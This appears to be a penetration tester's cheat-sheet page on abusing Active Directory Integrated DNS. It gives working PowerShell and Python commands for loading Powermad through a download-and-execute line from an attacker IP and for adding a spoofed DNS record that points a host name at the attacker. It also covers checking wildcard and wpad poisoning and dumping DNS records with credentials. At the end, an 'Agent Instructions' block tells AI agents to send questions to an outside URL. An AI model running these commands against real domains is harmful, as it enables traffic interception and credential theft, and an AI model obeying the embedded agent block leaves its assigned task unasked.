# ADIDNS Abuse

0\. Load tools:

```
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
```

1\. Check if you are able to modify (add) AD DNS names:

```
PS > Get-ADIDNSZone -Credential $cred -Verbose
DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=_msdcs.megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=megacorp,DC=local

PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal             : NT AUTHORITY\Authenticated Users
IdentityReference     : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
```

This `CreateChild` permission is what we need.

2\. Create, configure the new DNS name that could be likely exploited for spoofing with Attacker's IP and enable it. I chose `pc01` which was found in DNS cache:

```
PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37
PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose
PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

3\. Check the newly created DNS object and try to resolve it. AD will need some time (\~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol:

```
PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose
PS > Resolve-DNSName pc01
PS > cmd /c ping -n 1 pc01
```

4\. Clean up:

```
PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

## ADIDNS Poisoning (Wildcard Injection)

* <https://blog.netspi.com/exploiting-adidns/>
* <https://blog.netspi.com/adidns-revisited/>
* <https://www.gosecure.net/blog/2019/02/20/abusing-unsafe-defaults-in-active-directory/>

Check if we can perform the attack:

```
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r '*' --action query DC01.megacorp.local
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r 'wpad' --action query DC01.megacorp.local
```

## Tools

### adidnsdump

* <https://github.com/dirkjanm/adidnsdump>

```
$ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local -r [--dcfilter]
$ mv records.csv ~/ws/enum/adidns.csv
```

Check with ldapsearch:

```
$ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name
```

If you need to dump a child domain ADIDNS (say `child.megacorp.local`), then you may want to use `--zone` and `--forest` options:

```
# Will dump records from DC=megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local --zone megacorp.local --forest -r

# Will attempt to dump records from DC=child.megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=child,DC=megacorp,DC=local (and may fail)
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local -r
```

Merge all the IPs into `/24` CIDRs with a Python script:

{% code title="cidr\_merge.py" %}

```python
#!/usr/bin/env python3

"""
Merge standalone IPs into CIDRs.

Example:
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' > ip.lst
$ cidr_merge.py | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n | grep -e '^192' -e '^172' -e '^10'
"""

import netaddr

iplst = []
with open('ip.lst', 'r') as fd:
	for line in fd:
		ip = line.rstrip('\n')
		try:
			iplst.append(netaddr.IPNetwork(f'{ip}/24'))
		except netaddr.core.AddrFormatError:
			pass

for net in netaddr.cidr_merge(iplst):
	print(str(net))
```

{% endcode %}

Or using [mapcidr](https://github.com/projectdiscovery/mapcidr):

```
$ eget -qs linux/amd64 "projectdiscovery/mapcidr" --to mapcidr
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' | egrep '^[0-9]' | ./mapcidr -aa -silent | ./mapcidr -s -silent

$ cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M get-network -o ALL=true
```

### DnsServer

Dump ADIDNS using PowerShell and `DnsServer` module:

```
PS > Import-Module DnsServer
PS > Get-DnsServerZone -ComputerName DC01 | % {Get-DnsServerResourceRecord -ComputerName DC01 -ZoneName $_.ZoneName -RRType A} | ft -Wrap -AutoSize | tee adidns.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/adidns-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.